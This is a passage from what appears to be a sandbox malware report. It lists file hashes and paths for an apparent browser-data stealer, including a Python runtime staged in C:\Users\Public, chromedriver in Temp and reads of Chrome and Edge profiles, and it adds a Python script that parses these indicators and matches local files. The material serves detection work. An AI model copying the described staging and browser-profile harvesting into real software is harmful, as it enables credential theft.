SHA256 2e162781cd02127606f3f221fcaa19c183672d1d3e20fdb83fe9950ab5024244
SHA512 9a742c168a6c708a06f4307abcb92cede02400bf53a004669b08bd3757d8db7c660934474ec379c0464e17ffd25310dbab525b6991cf493e97dcd49c4038f9b7

C:\Users\Public\python39\lib\__pycache__\ntpath.cpython-39.pyc

MD5 e01fb1a26042889bf6bc8204c0d059e5
SHA1 59d8b4dd6c4ac888e237f6b8668d259094da052b
SHA256 838843af085ae8b59e76adcc84956d7e97f0d4594e5f1dedcad385907d693d3c
SHA512 ae158c70037233fdde49f30746d919896f82630cf7aa57c94da82ff220473508c160841e649e280c15ef797059105b87b405f2d8bae48bf0a9e586b3910a87e2

C:\Users\Public\python39\lib\ntpath.py

MD5 aea38f14b21e3b834e733f99be190c05
SHA1 286af16623185e1f27c36b463a61fe37830f2600
SHA256 51499c0f04c675a76c2e25551ed12d7fa9c22383caa1db3cfcd64f7c7e38e175
SHA512 536f863ac2ed408801f67efa06d3858ab6f7b853e489995f0c443e51e839dca53c5742cd46cf75706474978e33e48dcf3abe557db7b8f78226a3545a1df8201d

C:\Users\Public\python39\lib\__pycache__\enum.cpython-39.pyc

MD5 fc46e9958ac3a1b53f0d5dbdd952b429
SHA1 5750ee7f36439ec4c271f44f752676ae574fc3be
SHA256 0e3285efa073818c9f8f65ba57feda8893e4c8446cbef70c4ca3949ceb73f08a
SHA512 7335bec954150e9362f762a26153030f01967d866def3edfa1453c7b601f917749dcc84af2b6d23270fdb097330ea8056d43b1ff236ce8c0b09496046ae54d9c

C:\Users\Public\python39\lib\enum.py

MD5 2800d94c4e05031ccbd16d83b157ee8f
SHA1 a007615c0dbc484eccc7ad9ef266df5ca347cb44
SHA256 bd20dff0583493bc3b9b54914fe5243b87db67fbec27c77dfdb74c3b66340c1e
SHA512 e2e3b51314719d8902e80da748ace765e0b0e2d4860c427754ce896ff9c2c44bb64fb479d3361b924957ab00a5a12f116a0c0ffc0afa81466b75dd34860e8209

C:\Users\Public\python39\lib\__pycache__\re.cpython-39.pyc

MD5 7e8b78ce8707b2c57a89fc3fc5d2cff2
SHA1 a201c435da934dca04301124654681c5106a647b
SHA256 bf9ce9657f8a8f7bdb37dcbafcc97a396fc996421006f7fd11a32f5961ed5be3
SHA512 ebc6ebe46f827f69abbee1b918b1e5325c670ddbdd486a6bb6342e416efc07ab9e2212cd010fbd0046ec37afa8bc0109803cf966f748e3b7fbb6f6dea3c0c4e4

C:\Users\Public\python39\lib\re.py

MD5 32222a411b288a4f240b40b3010f3702
SHA1 e4f1d529d10b163cc06dc36b27c39b2fa9bec984
SHA256 26708bcb5ef63abff03c961805c245a06df40f2b09992872c7d6c22fa9a6a5c1
SHA512 3b1338a41bc07e4360284384396009f30a8c4a19461ce44d3f1c1d420d9d04d7a45fd8f88b71d29882c8f6dbdb04c72bce60bc19fc90c85c0181a19989c0a274

C:\Users\Public\python39\lib\__pycache__\types.cpython-39.pyc

MD5 58251cf7d8e26c0b7f59d7ae435064e9
SHA1 6e4656ff7da825b44452e2050c68f29a26b9550f
SHA256 7aaa796eac9d66f4a62c419da354394bac4fee674cbb416edbdbeba2cdf68b24
SHA512 536ff6f66a383dbfe74b13b9b41ea0aa8097c5a91fb48ad18706ad3ebbede87c21b7ae2fcb20747a1bfd325d7279b3cbf7f3c83cdb4d97f06c2bcff21664c5f2

C:\Users\Public\python39\lib\types.py

MD5 1ac1229b599cde6fc11ee88f70057127
SHA1 1518cb9c60a26d6d76352ee60e4ec05fa34c2691
SHA256 4cbb9b9a74bc10a9487cba76a3eb6faab17d93174413a298f800d954311d56db
SHA512 111c47d503d068a5a47d6ebf031f33e95207fbec13bb6bbe56ede1c20aa8d98d04bf2075c7bd3b62b4e67feddf7fe78f7aa59b4b0bebea61e58df84e9345e3fd

C:\Users\Admin\AppData\Local\Temp\selenium-managervO06gu\chromedriver.exe

MD5 3e9504b3472d017bdbf79ff995d8f575
SHA1 156d196d47b5025f575e19a7940aae51fbb59690
SHA256 3bd48933f56e62e23a9a6a999c66d944fa3b82d794da1549723662244cad6e4b
SHA512 0dd25ecaf86292c2085650c49de21cf10e24cc8e549520573cbb21e1793631985e21199f8e2ee10f87eb3a24cdd5da79024944fae9fb4c0528110a4aad433e21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 da6bc59547d468a006e17173a5be5ed4
SHA1 dfd137852d5983a25c72ce51dbfbcd5a9df3a742
SHA256 b3aedb335039bbc6e60412db86b29d7b515f632f208800d2423f00c161d82fd4
SHA512 1827d0d300f66d5508d398e8906ff932ce99893b75bbab07b6294086606f4232498aa07932f075c2a7dbe217508b16db856d7c5fef9caf52b7867656f5469236

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 eb331b05d862310ca182087a45c85331
SHA1 06bca021ea7042b16c78700bca6fced7e4c7ed59
SHA256 d41f95fe272445de1caf302c4633a6f56c56188d827f216e5f53f3929471657e
SHA512 193bd5e741890d09e6d3443cf9869d8e3e61b6a8e3f983533739bd8f710ae3c26c9374268969691d5ce943a738cd95df6a96393b1abb673af6893fd63d6e9435

C:\Users\Public\PublicAlbums\__MACOSX\._config.json

MD5 99b0e7801d40a2e63b4058c124fa17a9
SHA1 8dfdc32a6fa08b4d95af78ca9fc36fc40e614911
SHA256 fcbb9b80c7f405be8c394a78292cd73382faa3f12a6c9b4787e2154b87ebb4a1
SHA512 fff7bba8690a53944f6719cd72be6df4a85a609ba7803be8d3a75203bb8481a701c8c0649c59e2c3d63a30f7b7b5dda41283e2e1961e166d6444d655ead4bed7

memory/5936-5311-0x0000012DA6DD0000-0x0000012DA6DF0000-memory.dmp

memory/5936-5321-0x00007FF7973A0000-0x00007FF797FD3000-memory.dmp

memory/5936-5324-0x00007FF7973A0000-0x00007FF797FD3000-memory.dmp

memory/5936-5327-0x00007FF7973A0000-0x00007FF797FD3000-memory.dmp
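The Files listing above is the report's main hunting material: a dropped Python 3.9 runtime staged under C:\Users\Public, a chromedriver.exe in a temp directory (consistent with the "Uses browser remote debugging" and "Reads user/profile data of web browsers" signatures), and reads of Chrome and Edge profile files. The following Python is an added example, not part of the sandbox report; it parses this exact path/blank/MD5-SHA1-SHA256-SHA512 layout into indicator records, checks that each digest is well-formed, buckets the paths by where they sit (public staging directory, temp, browser profile, memory dump), and matches local files against the SHA256 set. The three entries embedded as input are copied from this section; the function and category names are the example's own.

```python
"""Turn a sandbox report's Files section into checkable indicators.

Added example (not the report's own code). Assumes the layout used above:
a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines; memory dump
entries are path-only.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Tuple

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HEX = re.compile(r"^[0-9a-f]+$")
_HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)\s*$")

# Constructed input: three entries copied verbatim from this report's Files
# section plus one of its memory-dump lines, in the report's own layout.
SAMPLE = r"""
C:\Users\Public\python39\documents.py

MD5 5d8c3f38a7ae3d542ae84255ee55cbeb
SHA1 803af1245bdc29eb1d6f5df508b150e285c2ef04
SHA256 6f886d7ec026fb64a099c8d4f717a6c26cfcb60233faf1b145ca73260ce86253
SHA512 c7639d0d4a0caca7ec46b26b236f3a82b9d72e9b587045f4b99d3c37c196403da6e0e087950bee8d2364a40ef950f9ef6079b7967ba490467c8334d9326462e8

C:\Users\Admin\AppData\Local\Temp\selenium-managervO06gu\chromedriver.exe

MD5 3e9504b3472d017bdbf79ff995d8f575
SHA1 156d196d47b5025f575e19a7940aae51fbb59690
SHA256 3bd48933f56e62e23a9a6a999c66d944fa3b82d794da1549723662244cad6e4b
SHA512 0dd25ecaf86292c2085650c49de21cf10e24cc8e549520573cbb21e1793631985e21199f8e2ee10f87eb3a24cdd5da79024944fae9fb4c0528110a4aad433e21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 da6bc59547d468a006e17173a5be5ed4
SHA1 dfd137852d5983a25c72ce51dbfbcd5a9df3a742
SHA256 b3aedb335039bbc6e60412db86b29d7b515f632f208800d2423f00c161d82fd4
SHA512 1827d0d300f66d5508d398e8906ff932ce99893b75bbab07b6294086606f4232498aa07932f075c2a7dbe217508b16db856d7c5fef9caf52b7867656f5469236

memory/5936-5321-0x00007FF7973A0000-0x00007FF797FD3000-memory.dmp
"""


@dataclass
class FileIOC:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

    @property
    def category(self) -> str:
        """Coarse bucket by location; the categories are this example's own."""
        p = self.path.lower().replace("/", "\\")
        if p.startswith("memory\\"):
            return "memory-dump"
        if "\\user data\\" in p and ("\\google\\chrome\\" in p or "\\microsoft\\edge\\" in p):
            return "browser-profile"
        if "\\appdata\\local\\temp\\" in p:
            return "temp"
        if "\\users\\public\\" in p:          # world-writable staging dir used for python39
            return "public-staging"
        return "other"

    def bad_hashes(self) -> List[str]:
        """Algorithms whose value is not lowercase hex of the expected length."""
        return [algo for algo, val in self.hashes.items()
                if not (_HEX.match(val) and len(val) == HASH_LEN[algo])]


def parse_files_section(text: str) -> List[FileIOC]:
    records: List[FileIOC] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _HASH_LINE.match(line)
        if m:
            # A hash line with no open record, or a repeated algorithm, means the
            # path line was lost (e.g. the block was split across page chunks).
            if not records or m.group(1) in records[-1].hashes:
                records.append(FileIOC(path="<path missing>"))
            records[-1].hashes[m.group(1)] = m.group(2).lower()
        else:
            records.append(FileIOC(path=line))
    return records


def summarize(records: Iterable[FileIOC]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for r in records:
        counts[r.category] = counts.get(r.category, 0) + 1
    return counts


def hash_file_sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def match_local_files(records: Iterable[FileIOC], candidates: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (local_path, report_path) pairs whose SHA256 appears in the report."""
    index = {r.hashes["SHA256"]: r for r in records if "SHA256" in r.hashes}
    hits = []
    for cand in candidates:
        try:
            digest = hash_file_sha256(cand)
        except OSError:                        # unreadable or absent: not a hit
            continue
        if digest in index:
            hits.append((cand, index[digest].path))
    return hits


def demo_local_match() -> bool:
    """Write a constructed file, hash it, and confirm the matcher finds it."""
    import os
    import tempfile
    payload = b"constructed sample payload"
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "dropped.bin")
        with open(target, "wb") as fh:
            fh.write(payload)
        ioc = FileIOC(path=r"C:\Users\Public\dropped.bin",
                      hashes={"SHA256": hashlib.sha256(payload).hexdigest()})
        return match_local_files([ioc], [target, os.path.join(tmp, "absent.bin")]) == [(target, ioc.path)]


if __name__ == "__main__":
    recs = parse_files_section(SAMPLE)
    print(summarize(recs))
    for r in recs:
        print(r.category, r.path, "BAD:" + ",".join(r.bad_hashes()) if r.bad_hashes() else "")
```

When run against the full section, the "public-staging" bucket is almost entirely the copied Python 3.9 standard library, which is why matching on SHA256 alone would flag any legitimate CPython install; the path (C:\Users\Public\python39) and the non-standard documents.py in its root are the better discriminators, with chromedriver.exe under Temp and reads of the Chrome and Edge User Data directories as corroborating artifacts.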